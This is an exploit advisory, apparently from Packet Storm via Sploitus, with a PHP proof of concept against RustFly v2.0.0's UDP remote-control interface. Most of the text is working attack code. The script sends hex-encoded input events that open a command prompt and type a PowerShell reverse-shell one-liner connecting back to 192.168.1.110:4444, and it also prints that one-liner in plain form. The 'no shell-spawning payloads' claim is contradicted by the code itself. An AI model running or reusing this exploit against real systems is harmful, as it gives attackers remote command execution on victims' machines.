Share
## https://sploitus.com/exploit?id=PACKETSTORM:215819
=============================================================================================================================================
    | # Title     : RustFly v2.0.0 - Event Manipulation                                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://bixat.dev/products/rustfly                                                                                          |
    =============================================================================================================================================
    
    [+] Summary    : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote
                     system-level operations. Improper sanitization allows command-level injection.
    
    Steps To Reproduce:
    -------------------
    1) Configure IP and port of RustFly target.
    2) Run this PHP PoC sender script.
    3) Observe behavior change / message processing by RustFly.
    
    =========================================================
    PoC Impact:
    -----------
    * Proof of input injection capability
    * Demonstrates command-carrier transport
    * No shell-spawning payloads included (safe demonstration)
    
    =========================================================
    Instructions:
    -------------
    Save file as:
        poc.php
    
    Run:
        php poc.php
    
    <?php
    $target_ip = "192.168.1.107";
    $target_port = 5005;
    
    $messages = [
        "6D6F76653A2D35352C31303530",  // move:-55,1050
        "646F75626C655F636C69636B",     // double_click
        "746578743A636D64",             // text:cmd
        "6B65793A656E746572",           // key:enter
        // Warning: This is a PowerShell command to create a reverse shell - potentially harmful use
        "746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22",
        "6B65793A656E746572",           // key:enter
    ];
    
    $dangerous_powershell = hex2bin($messages[4]);
    echo "=== Warning: Analyzing Dangerous Content ===\n";
    echo "The PowerShell command encoded in hex is:\n";
    echo $dangerous_powershell . "\n\n";
    
    $decoded_ps = "powershell -nop -c \"\$c=New-Object System.Net.Sockets.TCPClient('192.168.1.110',4444);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){;\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=iex \$d 2>&1;\$s.Write((New-Object -TypeName System.Text.ASCIIEncoding).GetBytes(\$r + 'PS > '),0,(\$r + 'PS > ').Length)}\"";
    
    echo "=== Security Warning ===\n";
    echo "This code contains a dangerous PowerShell command:\n";
    echo "--------------------------------------------------\n";
    echo $decoded_ps . "\n";
    echo "--------------------------------------------------\n\n";
    echo "This command does:\n";
    echo "1. Creates TCP connection to 192.168.1.110 on port 4444\n";
    echo "2. Establishes a reverse shell (backdoor connection)\n";
    echo "3. Executes any commands sent by the attacker\n";
    echo "4. Returns results to the attacker\n\n";
    
    echo "Do you want to continue? (yes/no): ";
    $handle = fopen("php://stdin", "r");
    $line = fgets($handle);
    fclose($handle);
    
    if(trim(strtolower($line)) != 'yes') {
        echo "Operation cancelled.\n";
        exit(0);
    }
    
    echo "Continuing...\n\n";
    
    $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    if ($sock === false) {
        echo "[-] Failed to create socket: " . socket_strerror(socket_last_error()) . "\n";
        exit(1);
    }
    
    if (!socket_bind($sock, "0.0.0.0", 0)) {
        echo "[-] Failed to bind socket: " . socket_strerror(socket_last_error()) . "\n";
        socket_close($sock);
        exit(1);
    }
    
    socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 5, "usec" => 0));
    
    try {
        foreach ($messages as $index => $msg) {
    
            $binary_msg = hex2bin($msg);
            if ($binary_msg === false) {
                echo "[-] Invalid hex string: $msg\n";
                continue;
            }
            $sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);
            
            if ($sent === false) {
                echo "[-] Failed to send data: " . socket_strerror(socket_last_error()) . "\n";
            } else {
    
                $display_msg = preg_replace('/[^\x20-\x7E]/', '', $binary_msg);
                echo "[+] Message " . ($index + 1) . " sent: $display_msg\n";
    
                if ($index == 4) {
                    echo " Warning: Malicious PowerShell command sent!\n";
                }
            }
            
            sleep(1);
        }
        
        echo "\n[+] All messages sent successfully.\n";
        echo " Warning: If executed, the target machine will connect to 192.168.1.110:4444\n";
        
    } catch (Exception $e) {
        echo "[-] Exception: " . $e->getMessage() . "\n";
    }
    
    finally {
        socket_close($sock);
        echo "[*] Socket closed.\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================